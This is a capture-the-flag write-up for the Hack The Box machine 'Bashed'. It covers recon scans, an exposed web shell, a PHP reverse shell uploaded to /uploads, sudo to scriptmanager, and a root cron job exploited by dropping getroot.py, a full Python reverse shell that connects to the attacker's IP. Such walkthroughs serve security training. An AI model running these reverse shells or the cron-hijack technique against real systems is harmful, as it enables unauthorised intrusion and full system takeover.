HTB Bashed

$nmap -T4 -A -sV -p- 10.10.10.68

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 17:31 CEST
Nmap scan report for 10.10.10.68
Host is up (0.044s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.95 seconds

Browsing to http://10.10.10.68 shows Arrexel's development site (matching the nmap http-title). Next, a nikto scan of the web server:

$nikto -h 10.10.10.68

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.68
+ Target Hostname:    10.10.10.68
+ Target Port:        80
+ Start Time:         2020-07-16 17:35:41 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 1e3f, size: 55f8bbac32f80, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /dev/: Directory indexing found.
+ OSVDB-3092: /dev/: This might be interesting...
+ OSVDB-3268: /php/: Directory indexing found.
+ OSVDB-3092: /php/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7864 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2020-07-16 17:42:17 (GMT2) (396 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirb/common.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.68
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/07/16 17:41:19 Starting gobuster
===============================================================
http://10.10.10.68/.hta (Status: 403)
http://10.10.10.68/.htpasswd (Status: 403)
http://10.10.10.68/.htaccess (Status: 403)
http://10.10.10.68/css (Status: 301)
http://10.10.10.68/dev (Status: 301)
http://10.10.10.68/fonts (Status: 301)
http://10.10.10.68/images (Status: 301)
http://10.10.10.68/index.html (Status: 200)
http://10.10.10.68/js (Status: 301)
http://10.10.10.68/php (Status: 301)
http://10.10.10.68/server-status (Status: 403)
http://10.10.10.68/uploads (Status: 301)
===============================================================
2020/07/16 17:41:40 Finished
===============================================================

Web shell

The /dev/ directory listed by both nikto and gobuster holds a browser-based web shell. Commands typed into it run as www-data (note the working directory /var/www/html/dev in the prompt below), which is already enough to read the user flag:

www-data@bashed:/var/www/html/dev# cd /home/
www-data@bashed:/home# ls

arrexel
scriptmanager

www-data@bashed:/home# cd arrexel
www-data@bashed:/home/arrexel# cat user.txt

2c28XXXXXXXXXXXXXXXXXXXXXXXXXXXX

www-data@bashed:/var/www/html/dev# sudo -l

Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

sudo -l shows that www-data may run any command as the scriptmanager user (and group) without a password: NOPASSWD: ALL, scoped to scriptmanager, nothing as root. Running sudo -u scriptmanager bash -i should therefore spawn a bash shell as scriptmanager. Before trying it, a look at the filesystem root shows a /scripts directory owned by scriptmanager, which is unusual:

www-data@bashed:/# ls -la

total 88
drwxr-xr-x 23 root root 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
drwxr-xr-x 2 root root 4096 Dec 4 2017 bin
drwxr-xr-x 3 root root 4096 Dec 4 2017 boot
drwxr-xr-x 19 root root 4240 Jul 16 08:29 dev
drwxr-xr-x 89 root root 4096 Dec 4 2017 etc
drwxr-xr-x 4 root root 4096 Dec 4 2017 home
lrwxrwxrwx 1 root root 32 Dec 4 2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x 19 root root 4096 Dec 4 2017 lib
drwxr-xr-x 2 root root 4096 Dec 4 2017 lib64
drwx------ 2 root root 16384 Dec 4 2017 lost+found
drwxr-xr-x 4 root root 4096 Dec 4 2017 media
drwxr-xr-x 2 root root 4096 Feb 15 2017 mnt
drwxr-xr-x 2 root root 4096 Dec 4 2017 opt
dr-xr-xr-x 110 root root 0 Jul 16 08:29 proc
drwx------ 3 root root 4096 Dec 4 2017 root
drwxr-xr-x 18 root root 500 Jul 16 08:29 run
drwxr-xr-x 2 root root 4096 Dec 4 2017 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 scripts
drwxr-xr-x 2 root root 4096 Feb 15 2017 srv
dr-xr-xr-x 13 root root 0 Jul 16 08:53 sys
drwxrwxrwt 10 root root 4096 Jul 16 09:06 tmp
drwxr-xr-x 10 root root 4096 Dec 4 2017 usr
drwxr-xr-x 12 root root 4096 Dec 4 2017 var
lrwxrwxrwx 1 root root 29 Dec 4 2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic

www-data@bashed:/# sudo cd scriptmanager

sudo: no tty present and no askpass program specified

www-data@bashed:/# cd scripts
www-data@bashed:/# sudo -u scriptmanager bash

bash: cannot set terminal process group (746): Inappropriate ioctl for device
bash: no job control in this shell
scriptmanager@bashed:/$ exit

Neither attempt works from the web shell: sudo has no tty to prompt on ("no tty present"), and the bash it does spawn has no controlling terminal and no job control, so the session is unusable. (Incidentally, cd is a shell builtin rather than a program, so sudo cd would not work even with a tty, and the directory is /scripts, not scriptmanager.) We need a real interactive shell, and since there is an /uploads folder we can place a reverse shell there.

Let's use our usual http://pentestmonkey.net/tools/php-reverse-shell, with $ip and $port in the script set to our box (10.10.14.14) and the listener port (1234). We serve it from our machine with a small HTTP server, fetch it into /uploads from the web shell (with wget, as done later for getroot.py), start the listener, and then request the file:

$python -m SimpleHTTPServer 8080
$nc -lvnp 1234

Browsing to http://10.10.10.68/uploads/shell.php triggers the connect-back:

listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.68] 39740
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 09:45:46 up  1:16,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bashed:/$ 

Now we have a shell as www-data, and the python pty trick gives it a proper tty.

Let's go back to the earlier command, sudo -u scriptmanager bash -i, which works now that sudo has a tty:

www-data@bashed:/$ sudo -u scriptmanager bash -i

scriptmanager@bashed:/$    

We are now scriptmanager, so we can look inside /scripts.

scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -la

total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jul 16 09:51 test.txt

scriptmanager@bashed:/scripts$ cat test.py

f = open("test.txt", "w")
f.write("testing 123!")
f.close

scriptmanager@bashed:/scripts$ ls -la

total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jul 16 09:53 test.txt

scriptmanager@bashed:/scripts$ ls -la

total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jul 16 09:54 test.txt

test.txt is owned by root and its mtime advances by one minute between listings, while test.py, the only thing in the directory that writes test.txt, is owned and writable by scriptmanager. A scriptmanager process could not even write to a root-owned 0644 file, so the file is being rewritten by root: a scheduled job running as root executes test.py roughly every minute. If that job runs every script in /scripts rather than test.py by name, a new .py dropped into the directory (which scriptmanager owns) would also run as root; and even if it only runs test.py, that file is writable by scriptmanager, so overwriting it would work just as well. Let's test the first hypothesis.
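The inference above (periodic root execution from a directory we control) can be made mechanically. The following is an added example, not code from the writeup: it infers the scheduler cadence from mtime samples of the output file, and reports which scripts in the directory a given uid could modify or add, using stat() mode bits rather than os.access() so the answer does not silently change when run as root. The directory it builds is a constructed stand-in for /scripts; the mtimes in the usage call are constructed too.

```python
"""Infer cron cadence from mtime samples and audit what a uid can
change in the directory the scheduler executes from.  Added example;
paths, mtimes and the demo directory are constructed for illustration."""
import os
import stat
import tempfile
from collections import Counter
from typing import Dict, List, Optional, Tuple


def infer_period(mtimes: List[float], tolerance: float = 2.0) -> Optional[float]:
    """Most common gap between successive mtime samples (seconds), or None
    if fewer than two distinct samples exist.  Gaps are bucketed to
    `tolerance` seconds so a job's own runtime jitter does not split one
    cadence into several bins."""
    samples = sorted(set(mtimes))
    if len(samples) < 2:
        return None
    gaps = [b - a for a, b in zip(samples, samples[1:])]
    bucketed = [round(g / tolerance) * tolerance for g in gaps]
    period, _ = Counter(bucketed).most_common(1)[0]
    return period


def mode_allows_write(mode: int, file_uid: int, file_gid: int,
                      uid: int, gids: List[int]) -> bool:
    """POSIX owner/group/other write check on stat() data for `uid`."""
    if uid == file_uid:
        return bool(mode & stat.S_IWUSR)
    if file_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def audit_scripts_dir(path: str, uid: int, gids: List[int]) -> Dict[str, object]:
    """Describe what `uid` could do in a directory a privileged job runs
    scripts from: drop new files (dir writable), edit existing .py files,
    and which non-script files are owned by someone else (evidence that a
    different user is the one executing)."""
    d = os.stat(path)
    report: Dict[str, object] = {
        "dir_writable": mode_allows_write(d.st_mode, d.st_uid, d.st_gid, uid, gids),
        "scripts": {},
        "outputs_owned_by_others": [],
    }
    for name in sorted(os.listdir(path)):
        st = os.stat(os.path.join(path, name))
        if name.endswith(".py"):
            report["scripts"][name] = mode_allows_write(
                st.st_mode, st.st_uid, st.st_gid, uid, gids)
        elif st.st_uid != uid:
            report["outputs_owned_by_others"].append((name, st.st_uid))
    return report


def my_identity() -> Tuple[int, List[int]]:
    """Current uid and supplementary gids, as the audit would see them."""
    return os.getuid(), list(os.getgroups())


def make_demo_dir() -> str:
    """Constructed stand-in for /scripts: a group-writable directory
    (0774, like the real one) holding test.py (0644) and a read-only
    output file.  Everything is owned by the current user because an
    unprivileged demo cannot chown to root."""
    path = tempfile.mkdtemp(prefix="scripts_demo_")
    os.chmod(path, 0o774)
    script = os.path.join(path, "test.py")
    with open(script, "w") as f:
        f.write('f = open("test.txt", "w")\nf.write("testing 123!")\nf.close()\n')
    os.chmod(script, 0o644)
    output = os.path.join(path, "test.txt")
    with open(output, "w") as f:
        f.write("testing 123!")
    os.chmod(output, 0o444)
    return path


if __name__ == "__main__":
    # Constructed samples: four listings of test.txt about a minute apart.
    print("period:", infer_period([1000.0, 1060.0, 1120.0, 1181.0]))
    demo = make_demo_dir()
    uid, gids = my_identity()
    print("as owner:   ", audit_scripts_dir(demo, uid, gids))
    print("as stranger:", audit_scripts_dir(demo, uid + 100000, []))
```

On the real box, the same audit run as scriptmanager reports the directory and test.py as writable and test.txt as owned by uid 0, which is exactly the combination that makes dropping getroot.py worthwhile.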

getroot.py (adapted from the python one-liner at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

import socket,subprocess,os;
# connect back to our box; the address and port must match the nc listener
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.14",9999));
# point stdin, stdout and stderr of this process at the socket ...
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
# ... and hand them to an interactive /bin/sh; run by the root job, the shell is root
p=subprocess.call(["/bin/sh","-i"]);

scriptmanager@bashed:/scripts$ wget 10.10.14.14:8080/getroot.py

--2020-07-18 09:10:36--  http://10.10.14.14:8080/getroot.py
Connecting to 10.10.14.14:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 222 [text/plain]
Saving to: 'getroot.py'

getroot.py          100%[===================>]     222  --.-KB/s    in 0s      

2020-07-18 09:10:36 (33.4 MB/s) - 'getroot.py' saved [222/222]

scriptmanager@bashed:/scripts$ ls -la

total 20
drwxrwxr--  2 scriptmanager scriptmanager 4096 Jul 18 09:10 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager  222 Jul 18 09:10 getroot.py
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Jul 18 09:10 test.txt

With a listener on port 9999 started before the next minute's run, the callback arrives, and it is root:

$nc -lvnp 9999

listening on [any] 9999 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.68] 58898
/bin/sh: 0: can't access tty; job control turned off

# whoami

root

# python -c 'import pty; pty.spawn("/bin/bash");'

root@bashed:/scripts# 

root@bashed:/scripts# cd /root
root@bashed:~# cat root.txt

cc4fXXXXXXXXXXXXXXXXXXXXXXXXXXXX
